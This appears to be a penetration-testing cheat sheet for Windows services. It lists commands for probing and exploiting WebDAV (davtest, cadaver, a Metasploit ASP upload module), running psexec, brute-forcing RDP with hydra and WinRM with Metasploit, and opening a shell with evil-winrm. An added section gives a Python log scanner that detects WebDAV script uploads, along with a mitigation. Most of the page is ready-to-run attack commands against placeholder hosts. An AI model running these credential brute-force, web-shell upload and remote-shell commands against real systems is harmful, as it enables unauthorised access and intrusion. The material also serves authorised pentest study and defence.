Windows

Webdav

davtest

  • to scan the WebDAV server, pass the URL of the WebDAV directory to the tool:

davtest -url http://$IP/webdav -auth username:password

cadaver

  • to interact with the server (i.e. to put, download, etc. files).

cadaver http://$IP/dir #dir = webdav directory 

metasploit

  • exploiting with msfconsole (automating davtest + cadaver)

use exploit/windows/iis/iis_webdav_upload_asp

# note: this won't work if the extension the server allows is different
# only works if asp is executable on the server
# to check which extensions are executable, use davtest

set HttpUsername $username
set HttpPassword $password
set RHOSTS $IP
set PATH /webdav_dir/random_name.asp
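
The condition noted above (the server must accept uploads and execute the uploaded extension) leaves a clear trail in the IIS logs. The following is an added example, not part of the original page: it scans W3C-format log lines for accepted WebDAV PUTs of script files and for follow-up requests to them. The log sample, the field subset, the extension list and the function name find_webdav_abuse are constructed for illustration.

```python
import re

# Constructed IIS W3C log sample (not from the page); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 198.51.100.7 PROPFIND /webdav/ 207
2024-01-01 10:00:02 198.51.100.7 PUT /webdav/probe_x1.txt 201
2024-01-01 10:00:03 198.51.100.7 PUT /webdav/probe_x1.asp 201
2024-01-01 10:00:04 198.51.100.7 GET /webdav/probe_x1.asp 200
2024-01-01 10:00:05 198.51.100.7 PUT /webdav/probe_x1.php 403
2024-01-01 10:05:00 203.0.113.9 PUT /webdav/report.docx 201
2024-01-01 10:06:00 203.0.113.9 GET /webdav/report.docx 200
2024-01-01 10:07:00 198.51.100.7 MOVE /webdav/probe_x1.txt 201
"""

# Assumed list of server-side script extensions; adjust to the handlers in use.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|php|jsp|cgi|pl|shtml)$", re.I)

def find_webdav_abuse(log_text):
    """Return (severity, client_ip, method, path) tuples for suspicious WebDAV use."""
    fields, written, alerts = [], set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names declared by IIS
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        ip, method = row.get("c-ip"), row.get("cs-method", "").upper()
        path, status = row.get("cs-uri-stem", "").lower(), row.get("sc-status", "")
        ok = status.startswith("2")            # only requests the server accepted
        if method == "PUT" and ok:
            written.add((ip, path))
            if SCRIPT_EXT.search(path):
                alerts.append(("high", ip, method, path))      # script upload accepted
        elif method in ("MOVE", "COPY") and ok:
            # The Destination header is not among these log fields: review manually.
            alerts.append(("medium", ip, method, path))
        elif method == "GET" and ok and SCRIPT_EXT.search(path) and (ip, path) in written:
            alerts.append(("critical", ip, method, path))      # uploaded script then requested
    return alerts

if __name__ == "__main__":
    for alert in find_webdav_abuse(SAMPLE_LOG):
        print(*alert)
```

Any "high" or "critical" hit means the directory is both writable and script-enabled; removing the script/execute permission from the WebDAV directory or disabling WebDAV closes the path.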

psexec

psexec.py username@ip <cmd> #cmd.exe

RDP

  • what is rdp?

  • some tricks to pentest

msfconsole

  • to check whether a port is running RDP

use auxiliary/scanner/rdp/rdp_scanner

set rhosts $IP
set rport $port
run

hydra

  • bruteforce rdp

hydra -L /path/to/users.txt -P /path/to/wordlists.txt rdp://$IP:$PORT/

xfreerdp

  • connect to rdp port

xfreerdp /u:$username /p:$password /v:$IP:$PORT

Winrm

msfconsole

  • bruteforce winrm

use auxiliary/scanner/winrm/winrm_login

set RHOSTS $IP
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwd.txt

evil-winrm

  • connect & get shell

evil-winrm.rb -u $user -p '$passwd' -i $IP
